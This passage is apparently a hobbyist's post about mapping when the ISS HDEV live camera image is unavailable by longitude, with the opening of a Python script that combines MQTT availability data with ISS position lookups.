    client.subscribe("iss-hdev-availability/available-bool")

def on_message(client, userdata, msg):
    # The body of this handler was lost when the page was scraped; it
    # requested the current ISS position from a web service (urllib2/json)
    # and wrote the combined availability/location record to stdout.
    pass

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("test.mosquitto.org", 1883)
client.loop_start()

start_time = time.time()
duration = 24 * 3600
while True:
    try:
        if time.time() > (start_time + duration):
            break
        time.sleep(1)
    except KeyboardInterrupt:
        break
client.loop_stop()
So now we have live image availability vs location, for a 24h period. The dataset is here:
(it's also in the project files)
That data can be drawn on a map. I found out that there's a map toolkit for matplotlib, and installed it. The rest is quite simple:
import matplotlib as mpl
mpl.use('Agg')  # because the AWS EC2 machine doesn't have tkInter installed
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import numpy as np
import csv

m = Basemap(projection='cyl', llcrnrlat=-90, urcrnrlat=90,
            llcrnrlon=-180, urcrnrlon=180, resolution='c')
m.drawcoastlines()
x = []
y = []
xn = []
yn = []
npoints = 0
with open('hdev-availability.csv') as csvfile:
    csvreader = csv.reader(csvfile)
    for row in csvreader:
        npoints += 1
        lat = float(row[1])
        lon = float(row[2])
        available = int(row[3])
        if available:
            x.append(lon)
            y.append(lat)
        else:
            xn.append(lon)
            yn.append(lat)
plt.title("HDEV live image availability (last {} h)".format(int(npoints*6/3600)))
m.scatter(x, y, 3, marker='o', color='black', latlon=True)
m.scatter(xn, yn, 3, marker='o', color='red', latlon=True)
plt.savefig('hdev-availability-map.png')
# plt.show()
In the last line you see the save-image-to-file operation, and the result is the map shown at the top and again here:
| https://hackaday.io/project/14729-iss-hdev-image-availability/log/151304-availability-map | CC-MAIN-2019-26 | en | refinedweb
In this article, you are going to learn about how to change the pitch of the sound played using buttons with Arduino, Processing, and Wekinator.
We will read the states of the buttons with the Arduino and send them to Processing, which forwards them to the Wekinator software. Wekinator is trained on the samples we send through Processing and sends its output to ChucK, which changes the pitch of a sound.
Wekinator is a free, open source software that allows anyone to use machine learning to build new musical instruments, gestural game controllers, computer vision, or computer listening systems. Wekinator allows users to build new interactive systems by demonstrating human actions and computer responses, instead of writing programming code.
Setting up the Arduino Board
This project uses five buttons wired to an Arduino Uno. Make the connections for the buttons with the Arduino as seen in the figure below.
Project Sketches
On the input side, we will have an Arduino sketch and a Processing sketch. The Arduino sketch will read the states of the five buttons and forward it to Processing through serial communication. The Processing sketch will receive this data and will forward it to the Wekinator through the OSC (open sound control) protocol.
Arduino Sketch
#define buttonPin1 6
#define buttonPin2 5
#define buttonPin3 4
#define buttonPin4 3
#define buttonPin5 2

int inByte = 0; // incoming serial byte

// the setup function runs once when you press reset or power the board
void setup() {
  Serial.begin(115200);
  pinMode(buttonPin1, INPUT);
  pinMode(buttonPin2, INPUT);
  pinMode(buttonPin3, INPUT);
  pinMode(buttonPin4, INPUT);
  pinMode(buttonPin5, INPUT);
  establishContact(); // send a byte to establish contact until receiver responds
}

// the loop function runs over and over again forever
void loop() {
  // if we get a valid byte, read button pins:
  if (Serial.available() > 0) {
    // get incoming byte:
    inByte = Serial.read();
    // read the state of the pushbuttons:
    int buttonState1 = digitalRead(buttonPin1);
    int buttonState2 = digitalRead(buttonPin2);
    int buttonState3 = digitalRead(buttonPin3);
    int buttonState4 = digitalRead(buttonPin4);
    int buttonState5 = digitalRead(buttonPin5);
    Serial.write(buttonState1);
    Serial.write(buttonState2);
    Serial.write(buttonState3);
    Serial.write(buttonState4);
    Serial.write(buttonState5);
  }
}

void establishContact() {
  while (Serial.available() <= 0) {
    Serial.print('A'); // send a capital A
    delay(300);
  }
}
Processing Sketch
import processing.serial.*;
import oscP5.*;
import netP5.*;

OscP5 oscP5;
NetAddress dest;
Serial myPort; // The serial port
int[] serialInArray = new int[5]; // Where we'll put what we receive
int serialCount = 0; // A count of how many bytes we receive
int button1, button2, button3, button4, button5;
boolean firstContact = false; // Whether we've heard from the microcontroller

void setup() {
  size(256, 256); // Stage size
  noStroke(); // No border on the next thing drawn
  // Print a list of the serial ports, for debugging purposes:
  println(Serial.list());
  // Open the serial port. The port-selection line was garbled in the
  // source; Serial.list()[0] is an assumption, so use the index of your
  // Arduino's port:
  myPort = new Serial(this, Serial.list()[0], 115200);
  /* start oscP5, sending messages at port 9000 */
  oscP5 = new OscP5(this, 9000);
  dest = new NetAddress("127.0.0.1", 6448);
}

void draw() {
  // Send the OSC message
  sendOsc();
}

// The opening of this handler was lost in the source; the 'A' handshake
// below is reconstructed from the standard SerialCallResponse pattern,
// matching the Arduino sketch's establishContact():
void serialEvent(Serial myPort) {
  // read a byte from the serial port:
  int inByte = myPort.read();
  if (firstContact == false) {
    if (inByte == 'A') {
      myPort.clear();      // clear the serial buffer
      firstContact = true; // we've had first contact
      myPort.write('A');   // ask for more
    }
  } else {
    // Add the latest byte from the serial port to the array:
    serialInArray[serialCount] = inByte;
    serialCount++;
    // If we have 5 bytes:
    if (serialCount > 4 ) {
      button1 = serialInArray[0];
      button2 = serialInArray[1];
      button3 = serialInArray[2];
      button4 = serialInArray[3];
      button5 = serialInArray[4];
      // print the values (for debugging purposes only):
      println(button1 + "&" + button2 + "&" + button3 + "&" + button4 + "&" + button5);
      // Send a capital A to request new sensor readings:
      myPort.write('A');
      // Reset serialCount:
      serialCount = 0;
    }
  }
}

void sendOsc() {
  OscMessage msg = new OscMessage("/wek/inputs");
  msg.add((float)button1);
  msg.add((float)button2);
  msg.add((float)button3);
  msg.add((float)button4);
  msg.add((float)button5);
  oscP5.send(msg, dest);
}
Setting up ChucK
On the output side, we use ChucK to receive the five continuous outputs from Wekinator and produce sounds based on them.
Download the FM Synthesis example for the operating system that you are using.
Now open up the terminal and go to the directory where you have placed it and type in the following line:
chuck FMSynth_5ContinousOutputs.ck
ChucK will start listening for the output from Wekinator and, on receiving it, will change the pitch of a sound.
Setting up Wekinator
Now open Wekinator and make the following adjustments to the settings:
- Set the inputs to 5 and outputs to 5
- Select the output type to all continuous
Wekinator will receive five inputs from Processing and, after training, will send five different outputs to Chuck. From there, ChucK will produce different sounds according to the Wekinator output.
Click on the Next button and you will see this window:
Press the first button and click on randomize. Start the recording for a second and it will record some samples.
Press the second button and click on randomize. Then record for a second.
Similarly, record the samples for the other three buttons.
After recording the five samples, click on train to train Wekinator. Then click run. Now when you press the buttons, the program will make the sound according to the inputs that you give. | https://maker.pro/arduino/tutorial/how-to-build-an-arduino-sound-pitch-machine | CC-MAIN-2019-26 | en | refinedweb |
Hi, I've spent several hours on this and I can't figure out what's wrong :( Please help.
Edit 2: I tried everything in Dev-C++ and there were no errors (I was originally using VC++), so it's a debugger problem :/ I still don't know how to solve it...
Edit: Here's a smaller program that I thought was pretty straightforward that still gives me the same error when debugging
Code:
#include<iostream>
using namespace std;
int main() {
int m=4;
int ** Rows;
Rows = new int * [m];
return 0;
}
Code:
#include<iostream>
using namespace std;
struct Node {
int row;
int col;
int value;
Node * next_in_col;
Node * next_in_row;
};
int main() {
int m, n;
cin >> m >> n;
Node * * Rows;
Rows = new Node * [m];
}
When I debug I get this error message:
"There is no source code available for the current location.
OK / Show Disassembly"
(the yellow arrow points to the first line: "mov edi,edi")
Quote:
--- f:\dd\vctools\crt_bld\self_x86\crt\src\newaop.cpp --------------------------
002C14C0 mov edi,edi
002C14C2 push ebp
002C14C3 mov ebp,esp
002C14C5 mov eax,dword ptr [count]
002C14C8 push eax
002C14C9 call operator new (2C1186h)
002C14CE add esp,4
002C14D1 pop ebp
002C14D2 ret
Also, I know it runs, but when I put it in a larger program it crashes miserably :( | https://cboard.cprogramming.com/cplusplus-programming/126426-there-no-source-code-available-current-location-printable-thread.html | CC-MAIN-2017-30 | en | refinedweb |
Red Hat Bugzilla – Full Text Bug Listing
+++ This bug was initially created as a clone of Bug #831254 +++.
--- Additional comment from jshaughn@redhat.com on 2012-06-12 12:00:35 EDT ---.
--- Additional comment from jshaughn@redhat.com on 2012-06-13 21:56:54 EDT ---.
Release/jon3.1.x commit: d06810bddd374669a54f254ad7ca7b94ccae0da5.
Conflicts:
modules/enterprise/gui/coregui/src/main/java/org/rhq/enterprise/gui/coregui/client/inventory/resource/ResourceCompositeSearchView.java
modules/enterprise/gui/coregui/src/main/java/org/rhq/enterprise/gui/coregui/client/inventory/resource/detail/ResourceTreeView.java
Cherry-pick of master: 1667f9730e4d547b399e1b30ad9965d8773d11a5
JON 3.1.1 ER1 build is available. Moving to ON_QA.
verified on JON 3.1.1 ER1
Created attachment 602168 [details]
import resources
verified.
Bulk closing of old issues in VERIFIED state. | https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=841274 | CC-MAIN-2017-30 | en | refinedweb |
[OSM] [Dependency] How can reverse dependencies be configured - Rakesh N, May 24, 2013 1:18 PM
The following is the business requirement for a Product Spec PS1 -
If Action Code is ADD - Function A --> Function B
If Action Code is DELETE - Function B --> Function A
Fulfillment Mode is DELIVER for both the scenarios with just different Action Codes.
This is NOT a rare requirement since Fulfillment Systems expect instructions to provision a service and terminate a service in reverse order. When an order is cancelled in-flight, that's how OSM typically rolls back the activities - in reverse order. However, this requirement is for a ceasing an existing service and NOT cancellation.
I configured the above 2 required dependencies in a Product Spec using a Property Correlation Order Item Dependency. The xqueries of those dependencies are such that only one of them will return <osm:dependency/> nodes. The cartridge was built successfully with warnings and was deployed successfully. However, on submission of an order, OSM threw a circular dependency error. In order to rule out the possibility of erroneous xqueries, I made both of them return () only. So technically none of the dependencies will be created in the final orchestration plan. However, the error still persists.
So, one can safely conclude that OSM cannot tolerate reverse dependencies in a Product Spec, regardless of whether they appear in the final orchestration plan. (BUG?)
Is there any elegant solution to configure such dependencies.
Thanks in advance
Rakesh
Edited by: Rakesh N on 24-May-2013 06:15
Edited by: Rakesh N on 24-May-2013 06:17
Edited by: Rakesh N on 24-May-2013 06:18
1. Re: [OSM] [Dependency] How can reverse dependencies be configured - Viktor.Jarolim-Oracle, May 30, 2013 8:59 AM (in response to Rakesh N)
Hi, I would suggest that you raise an SR.
Viktor
2. Re: [OSM] [Dependency] How can reverse dependencies be configured - Rakesh N, May 30, 2013 9:29 AM (in response to Viktor.Jarolim-Oracle)
I did Viktor. It's been a week almost. No response yet :)
3. Re: [OSM] [Dependency] How can reverse dependencies be configured - c3219a02-5ae8-40f3-8fd3-f07338d737f6, Jun 13, 2013 9:22 AM (in response to Rakesh N)
1 person found this helpful
Hi Rakesh,
Though I do not consider it as a bug, but would be a good feature to have.
In the mean time, you may try following workaround to achieve same result.
I suggest you create one more function - Function C - and set the dependencies in PS1 as Function A -> Function B and Function B -> Function C.
Also, in the last stage of decomposition of FunctionC (i.e. SignificantUpdate), set a condition so that the FunctionC executable component is created only for the DELETE line.
Similarly, in the last stage of decomposition of FunctionA (i.e. SignificantUpdate), set a condition so that the FunctionA executable component is created only for the ADD line.
Obviously, you have to take care to ensure that both of the executable components (A, C) send their payload to the same target system.
Regards
Sumanta
4. Re: [OSM] [Dependency] How can reverse dependencies be configured - SrinivasK, Sep 30, 2013 5:50 AM (in response to c3219a02-5ae8-40f3-8fd3-f07338d737f6)
Hi Sumanta,
I am going through this conversation to understand the solution aspects for this type of scenario.
What do you mean by SignificantUpdate? Is that an OOTB feature?
5. Re: [OSM] [Dependency] How can reverse dependencies be configured - Rakesh N, Oct 24, 2013 10:40 AM (in response to SrinivasK)
Hi Srinivas,
The OOTB O2A PIP cartridges have the following stages -
- Determine Fulfillment Function
- Determine Target System
- Determine Processing Granularity
- Determine Significant Updates
I hope that helps
Regards
Rakesh
6. Re: [OSM] [Dependency] How can reverse dependencies be configured - Sachin_Lokhande_OSM, Feb 20, 2014 2:05 PM (in response to Rakesh N)
Hi Rakesh,
Did solution mentioned by Sumanta worked in your case or you implemented any other solution?
Please let us know your comments because we came across same situation.
Regards,
Sachin L | https://community.oracle.com/message/11067832?tstart=0 | CC-MAIN-2017-30 | en | refinedweb |
ACTIVITY SUMMARY (2011-01-28 - 2011-02-04)
Python tracker at

To view or respond to any of the issues listed below, click on the issue.
Do NOT respond to this message.

Issues counts and deltas:
open 2585 (+18)
closed 20314 (+52)
total 22899 (+70)
Open issues with patches: 1102

Issues opened (49)
==================

#10918: **kwargs unnecessarily restricted in concurrent.futures 'submi reopened by bquinlan
#11023: pep 227 missing text reopened by r.david.murray
#11048: "import ctypes" causes segfault on read-only filesystem opened by Arach
#11049: add tests for test.support opened by brett.cannon
#11050: email.utils.getaddresses behavior contradicts RFC2822 opened by Ivan.Egorov
#11051: system calls per import opened by pitrou
#11055: OS X IDLE 3.2 Save As menu accelerator opens two Save windows opened by ned.deily
#11056: 2to3 fails for inner __metaclass__ class definition opened by nw
#11062: mailbox fails to round-trip a file to a Babyl mailbox opened by r.david.murray
#11063: uuid.py module import has heavy side effects opened by Keith.Dart
#11067: Py_LIMITED_API breaks most PySomething_Check() functions opened by petere
#11071: What's New review comments opened by ncoghlan
#11072: Add MLSD command support to ftplib opened by giampaolo.rodola
#11074: fix tokenize so it can be reloaded opened by brett.cannon
#11076: Iterable argparse Namespace opened by vdupras
#11077: Tkinter is not thread safe opened by PythonInTheGrass
#11078: Have test___all__ check for duplicates opened by r.david.murray
#11079: Make OS X entry in Applications like that in Windows opened by rhettinger
#11085: expose _abcoll as collections.abc opened by rhettinger
#11086: add lib2to3/__main__.py opened by brett.cannon
#11087: Speeding up the interpreter with a few lines of code opened by jneb
#11088: IDLE on OS X with Cocoa Tk 8.5 can hang waiting on input / raw opened by ned.deily
#11089: ConfigParser 50x slower in 2.7 opened by vlachoudis
#11090: Doc errors for unittest in Python 3.1 opened by michael.foord
#11092: Setup.cfg isn't packaged when running sdist opened by Julien.Miotte
#11093: test_future - rename not-unittest files to make regrtest.NOTTE opened by sandro.tosi
#11096: Multiple turtle tracers opened by amcnerney13
#11097: MSI: Remove win32com dependency from installer generator opened by techtonik
#11100: test_fdopen: close failed in file object destructor opened by ekrauss
#11101: plistlib has no graceful way of handing None values opened by bobveznat
#11102: configure doesn't find "major()" on HP-UX v11.31 opened by Oren_Held
#11103: Python 3.2 installer doesn't register file extensions on Windo opened by darren
#11104: distutils sdist ignores MANIFEST opened by jdennis
#11105: Compiling evil ast crashes interpreter opened by benjamin.peterson
#11107: Cache constant "slice" instances opened by scoder
#11109: socketserver.ForkingMixIn leaves zombies opened by jwark
#11110: Py_DECREF->Py_XDECREF in Module/_sqlite/module.c opened by brett.cannon
#11112: UDPTimeoutTest derives from SocketTCPTest opened by rmtew
#11113: html.entities mapping dicts need updating? opened by Brian.Jones
#11114: TextIOWrapper.tell extremely slow opened by Laurens
#11116: mailbox and email errors opened by sdaoden
#11117: Implementing Async IO opened by jcea
#1103350: send/recv SEGMENT_SIZE should be used more in socketmodule reopened by r.david.murray
#11060: distutils2 sdist does not complain about version that is not P opened by gotcha
#11061: Verify command option before parsing config file opened by sdouche
#11066: cgi.py proposals : sys.stdout encoding + rewriting of parsing opened by quentel
#11082: ValueError: Content-Length should be specified opened by William.Wu
#11084: Serialization of decimal.Decimal to XML-RPC opened by gdr
#1252236: Simplying Tkinter's event loop reopened by belopolsky

Most recent 15 issues with no replies (15)
==========================================

#11109: socketserver.ForkingMixIn leaves zombies
#11101: plistlib has no graceful way of handing None values
#11100: test_fdopen: close failed in file object destructor
#11097: MSI: Remove win32com dependency from installer generator
#11093: test_future - rename not-unittest files to make regrtest.NOTTE
#11088: IDLE on OS X with Cocoa Tk 8.5 can hang waiting on input / raw
#11074: fix tokenize so it can be reloaded
#11072: Add MLSD command support to ftplib
#11066: cgi.py proposals : sys.stdout encoding + rewriting of parsing
#11063: uuid.py module import has heavy side effects
#11062: mailbox fails to round-trip a file to a Babyl mailbox
#11060: distutils2 sdist does not complain about version that is not P
#11056: 2to3 fails for inner __metaclass__ class definition
#11055: OS X IDLE 3.2 Save As menu accelerator opens two Save windows
#11050: email.utils.getaddresses behavior contradicts RFC2822

Most recent 15 issues waiting for review (15)
=============================================

#11116: mailbox and email errors
#11110: Py_DECREF->Py_XDECREF in Module/_sqlite/module.c
#11109: socketserver.ForkingMixIn leaves zombies
#11104: distutils sdist ignores MANIFEST
#11102: configure doesn't find "major()" on HP-UX v11.31
#11101: plistlib has no graceful way of handing None values
#11093: test_future - rename not-unittest files to make regrtest.NOTTE
#11090: Doc errors for unittest in Python 3.1
#11089: ConfigParser 50x slower in 2.7
#11086: add lib2to3/__main__.py
#11082: ValueError: Content-Length should be specified
#11079: Make OS X entry in Applications like that in Windows
#11078: Have test___all__ check for duplicates
#11076: Iterable argparse Namespace
#11074: fix tokenize so it can be reloaded

Top 10 most discussed issues (10)
=================================

#11071: What's New review comments 20 msgs
#10845: test_multiprocessing failure under Windows 12 msgs
#7111: abort when stderr is closed 11 msgs
#10227: Improve performance of MemoryView slicing 11 msgs
#11114: TextIOWrapper.tell extremely slow 9 msgs
#11082: ValueError: Content-Length should be specified 9 msgs
#8914: Run clang's static analyzer 8 msgs
#11037: State of PEP 382 or How does distutils2 handle namespaces? 8 msgs
#11024: imaplib: Time2Internaldate() returns localized strings 8 msgs
#2193: Cookie Colon Name Bug 7 msgs

Issues closed (53)
==================

#6045: Add more dict methods to dbm interfaces closed by eric.araujo
#6465: email.feedparser regular expression bug (NLCRE_crack) closed by sandro.tosi
#7074: Turtle module crashes python closed by belopolsky
#8275: callback function on win64 results in bad behavior. mem corrup closed by pitrou
#9124: Mailbox module should use binary I/O, not text I/O closed by r.david.murray
#9127: subprocess.Popen.communicate() and SIGCHLD handlers closed by ned.deily
#9418: Move _formatter_* methods from string type into _string module closed by eric.smith
#9763: Crashes upon run after syntax error encountered in OSX 10.5.8 closed by ned.deily
#9884: The 4th parameter of method always None or 0 on x64 Windows. closed by owenl
#10480: cgi.py should document the need for binary stdin/stdout closed by v+python
#10573: Consistency in unittest assert methods: order of actual, expec closed by michael.foord
#10847: Distutils drops -fno-strict-aliasing when CFLAGS are set closed by eric.araujo
#10939: imaplib: Internaldate2tuple raises KeyError parsing month and closed by belopolsky
#10940: IDLE 3.2 hangs with Cmd-M hotkey on OS X 10.6 with 64-bit inst closed by ned.deily
#10961: Pydoc touchups in new browser for 3.2 closed by georg.brandl
#10989: ssl.SSLContext(True).load_verify_locations(None, True) segfaul closed by haypo
#11025: Distutils2 install command without setup.py or setup.cfg creat closed by eric.araujo
#11032: _string: formatter_field_name_split() and formatter_parser() d closed by eric.smith
#11035: Segmentation fault closed by brett.cannon
#11038: Some commands should stop if Name and Version are missing closed by eric.araujo
#11040: After registering a project to PyPI, classifiers fields aren't closed by eric.araujo
#11042: [PyPI CSS] Adding project urls onto a project page using regis closed by eric.araujo
#11043: On GNU/Linux (Ubuntu) distutils2.mkcfg shouldn't create an exe closed by eric.araujo
#11044: The description-file isn't handled by distutils2 closed by Julien.Miotte
#11052: Fix OS X IDLE menu accelerators for Save As and Save Copy closed by ned.deily
#11053: OS X IDLE 3 with Tk 8.4 appears to hang with syntax error closed by ned.deily
#11054: OS X installer build script for 3.2 can no longer build with s closed by ned.deily
#11057: Missing import of DistutilsOptionError closed by eric.araujo
#11064: abc documentation version conflict closed by dustin.farris
#11065: Fatal "can't locate locale" errors when zip file with director closed by ned.deily
#11068: Python 2.7.1 Idle traceback on OS X (10.6.6) closed by r.david.murray
#11069: IDLE crashes when Stack Viewer opened closed by georg.brandl
#11070: test_capi crashes and fails closed by brian.curtin
#11073: threading.Thread documentation can be improved closed by pitrou #11075: Using Turtle with IDLE on Mac OS X closed by amcnerney13 #11080: Win32Serial.read coding error for non-blocking read closed by brian.curtin #11081: from struct import * misses pack_into closed by belopolsky #11083: threading.Thread - start() rises RuntimeException? closed by brian.curtin #11091: Bug with reimport in pkg_resources closed by brett.cannon #11094: Runtime error closed by amaury.forgeotdarc #11095: subprocess popen broken for bytes and backslash closed by eric.smith #11098: syntax error at end of line in interactive python -u closed by r.david.murray #11099: Bytes pickled with 3.1 not unpickled with 2.7 correctly closed by r.david.murray #11106: python 2.6.6 and python 2.7.1 cannot be built successfully bec closed by skrah #11108: Intermittent AttributeError when using time.strptime in thread closed by amaury.forgeotdarc #11111: See "Gmail" on your Google homepage closed by belopolsky #11115: csv readers and writers should be context managers closed by r.david.murray #1613479: pydoc info for a package doesn't list all package contents closed by eric.araujo #10947: imaplib: Internaldate2tuple and ParseFlags require (and latter closed by lavajoe #11036: Allow multiple files in the description-file metadata closed by eric.araujo #11058: dist directory not created when running sdist command closed by kelseyhightower #11059: Mercurial fails on code.python.org repo closed by sdaoden #1647654: No obvious and correct way to get the time zone offset closed by belopolsky | https://mail.python.org/pipermail/python-dev/2011-February/107911.html | CC-MAIN-2017-30 | en | refinedweb |
All of us have probably written code like this:
Foo f = new Foo();
And what could be simpler? As long as the logic in the constructor is simple (or better yet, the constructor is empty), it would seem that the simplest code is the best, so just use the constructor. Certainly the MSDN documentation is rife with code that uses public constructors. You can probably find plenty of public constructors used right here on my blog. Why invest the effort in writing (and using) a factory class that will probably never do anything useful, other than call a public constructor?
In his excellent podcast entitled "Emergent Design: The Evolutionary Nature of Software Development," Scott Bain of Net Objectives nevertheless makes a strong case against the routine use of public constructors. The problem, notes Scott, is that the use of a public constructor ties the calling code to the implementation of Foo as a concrete class. But suppose that you later discover that there need to be many subtypes of Foo, and Foo should therefore be an abstract class instead of a concrete class--what then? You've got a big problem, that's what; a lot of client code that has been making use of Foo's public constructor suddenly becomes invalid.
Exposing a public constructor, observes Bain, allows code to violate the open/closed principle. This principle states that software should be open for extension, but closed for modification. Restating this in more mundane terms, developers should design their code in such a way that extending it (for example, making a class more useful by defining it as abstract and subclassing it as appropriate) does not provoke side effects elsewhere--and that's the "closed for modification" part in a nutshell.
Bain points out that there is a simple, low-cost practice that avoids the public constructor's violation of the open/closed principle. Just give a class constructor protected scope, and define a static Create method that uses the constructor--that's it. Here's class Foo's new skeletal definition in C#:
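The code block itself did not survive in this copy of the post, but from the description just given (a protected constructor plus a one-line static Create method), the skeletal definition would look roughly like this:

```csharp
public class Foo
{
    // Protected scope: client code cannot "new" a Foo directly, so Foo can
    // later become an abstract base class without breaking any callers.
    protected Foo() {}

    // The single extra line: clients call Foo.Create() instead of new Foo().
    public static Foo Create() { return new Foo(); }
}
```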
How hard was that? At the cost of a single line of code, you get benefits well beyond the already mentioned ability to transform the class into an abstract base class.
Unfortunately, you may occasionally encounter a corner case where you must define a public constructor. The .NET Framework's XmlSerializer cannot be used on a class with no public default constructor, since XmlSerializer must instantiate the class in order to discover the public properties that must be serialized. If you plan to serialize a class using XmlSerializer, then, you must make the constructor public--but you should mark it with the ObsoleteAttribute to warn fellow developers not to use it:
public class Foo
{
[Obsolete("Do not use--provided only for use by XmlSerializer. Client code should call Foo.Create().")]
public Foo() {}
public static Foo Create() { return new Foo(); }
}
If due to habit a fellow programmer calls the public constructor (against your intentions), the C# compiler will emit a helpful warning message. Of course, there are programmers who ignore warnings, but that is the subject of a different post. | http://geekswithblogs.net/chrisfalter/archive/2008/02/15/new-statement-considered-harmful.aspx | CC-MAIN-2017-30 | en | refinedweb |
On Tue, 2005-04-05 at 08:45 +0100, Christoph Hellwig wrote:
> This introduces various AUDIT_ARCH numerical constants, which is a blatantly
> stupid idea.  We already have a way to uniquely identify architectures, and
> that's the ELF headers, no need for another parallel namespace.

We do use the EM_xxx number space but that isn't sufficient to
distinguish between 32-bit and 64-bit incarnations of certain machine
types (S390, SH, MIPS, ...). I didn't much like adding it either, but
couldn't see a better option.

I pondered strings but we want to filter on this and don't want to have
to use strcmp. Got any better answers?

> (btw, could you please add to all patches who's responsible for them,
> bk-audit.patch doesn't tell)

If it were just to point to the BK tree, that might help.
( linux-audit.bkbits.net/audit-2.6-mm )

-- 
dwmw2
lemming77
lemming77 replied to GSnake's topic in For Beginners

I believe OpenGL is an open standard, rather than being open source. But that's a mistake we all make at some point.

My understanding is that the main distinguishing characteristic between C and C++ is that C++ is object oriented, while C is not. My experience with C is limited though, however OO is the dominant kind of programming knocking around right now I believe. If you've ever worked in one of the .net languages, that's OO.

One metaphor I find is nice with OO programming is to imagine what you want your program to do is a project you're overseeing, and each of your objects is somebody on your team working on it. You organize them to work on their own parts, and at the end, you get the big picture you want.

I'm afraid I can't point you in the direction of a good book or anything, as I approached C++ with lots of prior experience in OO programming. I'm sure there's plenty of people here who can, though!

And finally, I'd have assumed your native language was English. You write very eloquently, and use punctuation well. There's people born here in England whose English isn't as clear as yours!
lemming77 replied to lemming77's topic in For BeginnersI hadn't thought of it like that. I just assumed that templates came with a huge level of extra functionality which was going to waste. I've done some experiments, and I think you're right. I really like how the template solution has worked out so far. I want to play around with it some more first, to better get to know it. But it's looking very likely that's the way I'll go! Thank you for the help!
lemming77 replied to lemming77's topic in For BeginnersTemplates do seem like a nice solution, although I can't help but wonder whether it's a bit overkill, since there's only the two versions of each I need. Are there any other ways I could do this for comparison?
lemming77 posted a topic in For Beginners

Hi,

As I'm sure is standard practice, I have written a library to implement types like vectors, matrices, and so on, and it all works quite nicely. However I have hit a hurdle. Using D3D9 for graphics, that seems to like having its data in the form of single precision floats. Which is fair enough. But I'm feeling the need to do some intense physics simulation using double precision. So what I really want is some means of implementing both without duplicating my entire library.

My current implementation lets me switch between Float and Double types before compiling by means of a typedef instruction. But this doesn't quite give me the solution I need, as I'm stuck choosing one over the other.

[source lang="cpp"]
// The library is called Util. Not a great name, I know. Here's a small excerpt
// from Util.h. Define DOUBLE before compiling to use the double type.
// Otherwise, use the float type.
#ifdef DOUBLE
typedef double Real;
#define NAMESPACE Maths::Double
#else
typedef float Real;
#define NAMESPACE Maths
#endif

namespace Util
{
   namespace NAMESPACE
   {
      struct Angle;      // Euler angle
      struct Matrix;     // 4x4 Matrix
      struct Quaternion;
      struct Vector3;
   }
}

// An excerpt from Vector3.h
namespace Util
{
   namespace NAMESPACE
   {
      // Vector3, 3D coordinates
      struct Vector3
      {
      public:
         Real x, y, z;

         Vector3();                 // x=0 y=0 z=0
         Vector3(Real);             // x=a y=a z=a
         Vector3(Real, Real, Real); // x=a y=b z=c

         // ... Etc.
      };
   }
}
[/source]

Can anyone recommend a means to implement both types into the same library? Preferably while duplicating as little source code as possible. I'm using Visual C++ 2010 Express.

Thanks
lemming77 replied to pressgreen's topic in For Beginners

[quote name='mhagain' timestamp='1342644613' post='4960647'] DDS is good, yes. It's lossy for sure, but like FLeBlanc said it can contain a full mipmap chain, and you can load it directly into your GPU's video RAM via the appropriate API calls without needing to go through any intermediate software stages. [/quote]

DDS isn't necessarily lossy. DXT compression is lossy, but with DDS images, you have the option of using either that or storing them in an uncompressed format. I'd recommend experimenting with it a bit, as with some maps, this compression isn't a problem, and in others it is. For instance, DXT compressed normal maps tend to have quite ugly artefacts when used in game, but it's much less significant in DXT compressed albedo maps.
/*
 * Copyright (c) 2003 - 2007 OpenSubsystems s.r.o. Slovak Republic. All rights reserved.
 * 
 * Project: OpenSubsystems
 * 
 * $Id: SimpleLocalTransactionFactoryImpl.java,v 1.7 2007/01/07 06:14:21 bastafidli Exp $
 */

package org.opensubsystems.core.persist.db.transaction;

import java.sql.Connection;
import java.sql.SQLException;
import java.util.logging.Logger;

import javax.transaction.HeuristicMixedException;
import javax.transaction.HeuristicRollbackException;
import javax.transaction.NotSupportedException;
import javax.transaction.RollbackException;
import javax.transaction.Status;
import javax.transaction.SystemException;
import javax.transaction.TransactionManager;
import javax.transaction.UserTransaction;

import org.opensubsystems.core.error.OSSDatabaseAccessException;
import org.opensubsystems.core.error.OSSException;
import org.opensubsystems.core.persist.db.DatabaseConnectionFactoryImpl;
import org.opensubsystems.core.persist.db.DatabaseTransactionFactoryImpl;
import org.opensubsystems.core.util.GlobalConstants;
import org.opensubsystems.core.util.Log;

/**
 * Simplified transaction management implementation based on database connection
 * using the following assumptions:
 * 
 * Assumptions:
 * ------------
 * 1. Most applications use/access only a single database, therefore there is no
 *    need for a distributed transaction implementation.
 * 2. Applications consist of threads and each thread is using/needing only a
 *    single database connection at a time. Most threads will never need two
 *    connections at the same time to the same database.
 * 3. At most one transaction is in progress at any time in one thread.
 * 
 * Therefore if an application is accessing only a single database and threads
 * of the application use only a single connection at a time and start at most
 * one transaction at a time, the application can use this implementation of
 * transaction manager.
 * 
 * How it works:
 * -------------
 * 1. A thread is using a JDBC database connection to access the database.
 * 2. If a thread starts a transaction using UserTransaction.begin then the
 *    connection used to access the database in this transaction has to have
 *    autocommit set to false and the thread cannot issue commit or rollback on
 *    the transaction. Then when the thread ends the transaction using
 *    UserTransaction.commit or UserTransaction.rollback, the transaction
 *    manager commits or rolls back the connections which were used to access
 *    the database within this transaction.
 * 3. If a thread is accessing the database outside of a transaction, it can do
 *    whatever it wants with the connection including setting autocommit to true
 *    and calling commit and rollback on the connection.
 * 
 * There are 4 basic and 4 combined scenarios possible:
 * ----------------------------------------------------
 * 1. Connection is requested before the transaction and returned after the transaction
 * 
 *    DatabaseConnectionFactory.requestConnection
 *    UserTransaction.begin
 *    UserTransaction.commit/rollback
 *    DatabaseConnectionFactory.returnConnection
 * 
 * 2. Connection is requested in the transaction and returned after the transaction
 * 
 *    UserTransaction.begin
 *    DatabaseConnectionFactory.requestConnection
 *    UserTransaction.commit/rollback
 *    DatabaseConnectionFactory.returnConnection
 * 
 * 3. Connection is requested before the transaction and returned in the transaction
 * 
 *    DatabaseConnectionFactory.requestConnection
 *    UserTransaction.begin
 *    DatabaseConnectionFactory.returnConnection
 *    UserTransaction.commit/rollback
 * 
 * 4. Connection is requested in the transaction and returned in the transaction
 * 
 *    UserTransaction.begin
 *    DatabaseConnectionFactory.requestConnection
 *    DatabaseConnectionFactory.returnConnection
 *    UserTransaction.commit/rollback
 * 
 * 5. Connection is requested before the transaction and returned in the transaction
 *    and then connection is requested again in the transaction and returned in
 *    the transaction
 * 
 *    DatabaseConnectionFactory.requestConnection
